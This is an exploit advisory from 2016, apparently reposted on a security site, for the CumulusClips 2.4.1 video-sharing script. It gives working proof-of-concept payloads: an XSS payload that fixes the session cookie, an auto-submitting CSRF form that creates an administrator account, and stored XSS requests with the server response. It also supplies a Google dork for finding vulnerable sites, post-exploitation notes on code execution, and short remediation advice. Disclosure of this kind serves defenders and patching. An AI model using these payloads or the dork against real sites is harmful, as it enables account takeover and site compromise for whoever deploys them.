CumulusClips 2.4.1 Code Execution / CSRF / Cross Site Scripting

2016.09.09
Credit: Aukasz Korczyk
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-352
Dork: inurl:/cumulusclips/videos/

# Exploit Title: CumulusClips Session fixation # Google Dork: inurl:/cumulusclips/videos/ # Date: 2.09.2016 # Exploit Author: kor3k / Aukasz Korczyk # Vendor Homepage: http://cumulusclips.org/ # Software Link: http://cumulusclips.org/cumulusclips.zip # Version: 2.4.1 # Tested on: Debian Jessie Description: CumulusClips is a video sharing script that allows you to start your own video website. CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers. PoC: POST /cumulusclips/account/videos/edit/1362/ HTTP/1.1 Host: 192.168.122.203 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1362/ Cookie: PHPSESSID=bqaok1gfcs0s7hqfc40g2bsbr1 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 211 title=evilcartoon%3Cscript%3Edocument.cookie%3D%27PHPSESSID% 3Dxxxxxxxxxxxxxxxxxxxxxxxxxx%3Bpath%3D%2F%3B%27%3C% 2Fscript%3E&tags=aaa&cat_id=1&description=aaa&private_url= BOZtzZX&submitted=TRUE&button=Update+Video Remediation: Change session id after sucessful login Post exploitation: Since it is posible to impersonate admin there is possibility for a code execution and unrestricted file upload in admin panel. ####################################################### # Exploit Title: CumulusClips XSRF and code execution # Google Dork: inurl:/cumulusclips/videos/ # Date: 2.09.2016 # Exploit Author: kor3k / Aukasz Korczyk # Vendor Homepage: http://cumulusclips.org/ # Software Link: http://cumulusclips.org/cumulusclips.zip # Version: 2.4.1 # Tested on: Debian Jessie # CVE : [if applicable] Description: CumulusClips is a video sharing script that allows you to start your own video website. CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers. PoC: <html> <body> <form action="http://192.168.122.203/cumulusclips/cc-admin/members_add.php" method="POST"> <input type="hidden" name="role" value="admin" /> <input type="hidden" name="email" value="admin&#64;mailinator&#46;com" /> <input type="hidden" name="username" value="newadmin" /> <input type="hidden" name="password" value="newadminpass" /> <input type="hidden" name="password&#45;show" value="" /> <input type="hidden" name="first&#95;name" value="" /> <input type="hidden" name="last&#95;name" value="" /> <input type="hidden" name="website" value="" /> <input type="hidden" name="about&#95;me" value="" /> <input type="hidden" name="submitted" value="TRUE" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> Remediation: Use anti-csrf token, fix all XSS'es ####################################################### # Exploit Title: CumulusClips Persistent XSS # Google Dork: inurl:/cumulusclips/videos/ # Date: 2.09.2016 # Exploit Author: kor3k / Aukasz Korczyk # Vendor Homepage: http://cumulusclips.org/ # Software Link: http://cumulusclips.org/cumulusclips.zip # Version: 2.4.1 # Tested on: Debian Jessie # CVE : [if applicable] Description: CumulusClips is a video sharing script that allows you to start your own video website. CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers. Any registered user may inject a code to main site. There is no HTTPonly flag on cookies so it is possible to steal session information. PoC: locations: /cumulusclips/account/videos/edit/ /cumulusclips/account/upload/video/ POST /cumulusclips/account/videos/edit/1358/ HTTP/1.1 Host: 192.168.122.203 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1358/ Cookie: PHPSESSID=etia0ncfb00m0ma1834cf1dds5 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 215 title=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&tags=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cat_id=1&description=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&private_url=DyZbn8m&submitted=TRUE&button=Update+Video reflected on main site: GET /cumulusclips/ HTTP/1.1 Host: 192.168.122.203 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.122.203/ Connection: close RESPONSE: ... div class="video"> <div class="thumbnail"> <a href="http://192.168.122.203/cumulusclips/videos/1358/www-script-alert-1-script/" title="www<script>alert(1)</script>"> <img width="165" height="92" src="http://192.168.122.203/cumulusclips/cc-content/uploads/thumbs/Ufi5q2RKsQtXwludfZnR.jpg" /> ... Post exploitation: Since it is posible to steal the cookie and impersonate admin there is possibility for a code execution and unrestricted file upload in admin panel. Remediation: Validate user input for special characters (preferable white list), use HTTPonly header


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top